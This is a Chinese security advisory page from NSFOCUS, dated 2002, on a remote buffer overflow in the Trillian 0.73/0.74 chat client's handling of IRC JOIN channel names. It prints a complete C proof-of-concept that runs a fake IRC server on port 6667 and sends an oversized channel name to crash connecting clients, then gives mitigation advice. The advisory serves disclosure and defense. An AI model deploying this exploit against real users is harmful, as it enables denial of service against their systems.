首页 -> 安全研究

安全研究

安全漏洞
Trillian IRC JOIN远程缓冲区溢出漏洞

发布日期:2002-09-20
更新日期:2002-09-25

受影响系统:
Cerulean Studios Trillian 0.74
Cerulean Studios Trillian 0.73
描述:
BUGTRAQ  ID: 5765

Cerulean Studios Trillian是一个聊天程序,和多种即时通讯程序使用相同的接口,包括AIM、ICQ、Yahoo! Messenger、MSN Messenger和IRC。

Trillian在'JOIN'命令时对频道(channel)名处理存在问题,远程攻击者可以利用这个漏洞可能以Trillian用户权限在系统上执行任意指令。

Trillian在使用'JOIN'命令加入某个频道时对名称缺少正确缓冲区边界检查,远程IRC服务器如果设置的频道名超过206字节,可导致客户端崩溃,内存破坏,精心构建频道名数据可能以Trillian用户权限在系统上执行任意指令。

<*来源:Lance Fitz-Herbert (fitzies@hotmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103254430206198&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Lance Fitz-Herbert(fitzies@hotmail.com) 提供了如下测试程序:

/* Trillian-Join.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian Join Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5 Commandline Tools.

   This Example Will Just DoS The Trillian Client,
   not particularly useful, just proves the flaw exists.

*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>

SOCKET s;

#define MSG1 ":server 001 target :target\n:target!ident@address JOIN :"

int main() {

    SOCKET TempSock = SOCKET_ERROR;
    WSADATA WsaDat;
    SOCKADDR_IN Sockaddr;
    int nRet;
    char payload[300];

    printf("\nTrillian Join Flaw\n");
    printf("----------------------\n");
    printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
    printf("Tested On Version .74 and .73\nListening On Port 6667 For
Connections\n\n");

    if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
            printf("ERROR: WSA Initialization failed.");
        return 0;
    }


    /* Create Socket */
    s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == INVALID_SOCKET) {
        printf("ERROR: Could Not Create Socket. Exiting\n");
        WSACleanup();
        return 0;
    }

    Sockaddr.sin_port = htons(6667);
    Sockaddr.sin_family = AF_INET;
    Sockaddr.sin_addr.s_addr  = INADDR_ANY;


        nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
    if (nRet == SOCKET_ERROR) {
        printf("ERROR Binding Socket");
        WSACleanup();
        return 0;
    }

    /* Make Socket Listen */
    if (listen(s, 10) == SOCKET_ERROR) {
        printf("ERROR: Couldnt Make Listening Socket\n");
        WSACleanup();
        return 0;
    }

    while (TempSock == SOCKET_ERROR) {
          TempSock = accept(s, NULL, NULL);
    }

    printf("Client Connected, Sending Payload\n");

    send(TempSock,MSG1,strlen(MSG1),0);
    memset(payload,'A',300);
    send(TempSock,payload,strlen(payload),0);
    send(TempSock,"\n",1,0);

    printf("Exiting\n");
    sleep(100);
    WSACleanup();
    return 0;
}

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时不要使用Trillian进行IRC聊天。

厂商补丁:

Cerulean Studios
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ceruleanstudios.com/

浏览次数:2670
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障